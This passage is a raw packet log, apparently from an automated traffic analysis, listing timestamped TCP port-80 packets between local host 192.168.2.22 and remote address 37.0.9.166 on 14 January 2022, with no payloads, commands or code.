                                                          Jan 14, 2022 10:23:27.189500093 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189512968 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189526081 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189551115 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.189557076 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.189582109 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189594984 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189651012 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.214787006 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214819908 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214832067 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214854956 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214867115 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214884996 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214896917 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214910984 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214912891 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.214922905 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214937925 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214945078 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.214952946 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.214952946 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214967966 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214997053 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215003014 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215023041 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215037107 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215049982 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215061903 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215075016 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215087891 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215137959 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215189934 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215189934 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215197086 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215204000 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215230942 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215244055 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215256929 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215260029 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215271950 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215286970 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215302944 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215317011 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215326071 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215332985 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215377092 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215415955 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215430975 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215447903 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215461969 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215475082 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215509892 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.216061115 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216089964 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216137886 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216150999 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216156006 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.216165066 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216181993 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216201067 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216222048 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216242075 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.216268063 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.216290951 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216315031 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216342926 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216352940 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.216362000 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216378927 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216393948 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216408014 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216419935 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216450930 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.216470957 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.241797924 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.241889000 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.241914034 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.241925955 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.241949081 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.241961002 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.241970062 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.241985083 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.241991997 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242006063 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242011070 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242033005 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242043972 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242053032 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242115974 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242126942 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242136002 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242155075 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242175102 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242213011 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242213964 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242239952 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242254019 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242279053 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242302895 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242314100 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242332935 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242358923 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242378950 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242384911 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242398024 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242412090 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242418051 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242423058 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242438078 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242458105 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242484093 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242496014 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242602110 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242762089 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242786884 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242804050 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242821932 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242840052 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242860079 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242861032 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242866039 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242880106 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242904902 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242923021 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242923975 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242942095 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242947102 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.242963076 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242981911 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.242999077 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.243020058 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.243036032 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.243062019 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.243079901 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.243091106 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.243112087 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.243196011 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269184113 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269212961 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269226074 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269239902 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269257069 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269269943 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269283056 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269304037 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269316912 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269332886 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269339085 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269345999 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269360065 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269364119 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269375086 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269376993 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269391060 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269401073 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269408941 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269409895 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269433022 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269438028 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269445896 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269465923 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269507885 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269622087 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269646883 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269653082 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269661903 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269736052 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269805908 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269845963 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269877911 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269896030 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269906044 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269927979 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269947052 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269967079 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.269975901 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.269987106 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270008087 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270010948 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.270018101 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.270028114 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270041943 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.270050049 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.270056009 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270083904 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270088911 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270117998 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270142078 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270162106 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270181894 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270194054 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.270204067 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.270205021 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270226955 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270246029 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.270250082 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270272017 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270294905 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270317078 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270344019 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270363092 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270380974 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.270385981 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270391941 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.270397902 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.270406008 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.270456076 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296070099 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296098948 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296130896 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296152115 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296181917 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296202898 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296225071 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296257019 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296268940 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296288967 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296293020 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296322107 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296322107 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296356916 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296370983 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296380997 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296407938 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296437979 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296451092 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296480894 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296504021 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296530962 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296549082 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296551943 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296555996 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296561003 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296575069 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296597004 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296627045 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296648026 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296674967 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296696901 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296704054 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296711922 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296720028 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296753883 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296783924 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296825886 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296855927 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296886921 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296905994 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296910048 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296914101 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296919107 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.296932936 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296962023 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.296983957 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297005892 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297038078 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297061920 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297084093 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297112942 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297128916 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297135115 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297137022 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297142029 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297158003 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297178984 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297199965 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297200918 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297224045 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297245979 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297256947 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297267914 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297291040 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297307014 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297311068 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297333956 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297354937 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297378063 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297395945 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297406912 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297429085 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297430992 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297451019 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297486067 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297508955 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297528982 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297549963 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297570944 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297599077 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297621012 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297626972 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297633886 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297636986 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297643900 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297667027 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297688007 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297720909 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297744036 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297759056 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297764063 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297766924 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297772884 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297794104 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297815084 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297821999 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297838926 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297884941 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297905922 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297934055 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297935963 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.297960997 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.297976971 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298000097 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298028946 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298057079 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298058033 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298064947 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298079014 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298100948 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298121929 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298125029 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298139095 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298145056 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298154116 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298167944 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298190117 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298217058 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298238039 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298265934 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298286915 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298309088 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298325062 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298331022 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298331976 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298350096 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298353910 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298382044 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298417091 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298433065 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298461914 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298471928 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298481941 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298482895 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298505068 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298533916 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298554897 CET804917037.0.9.166192.168.2.22
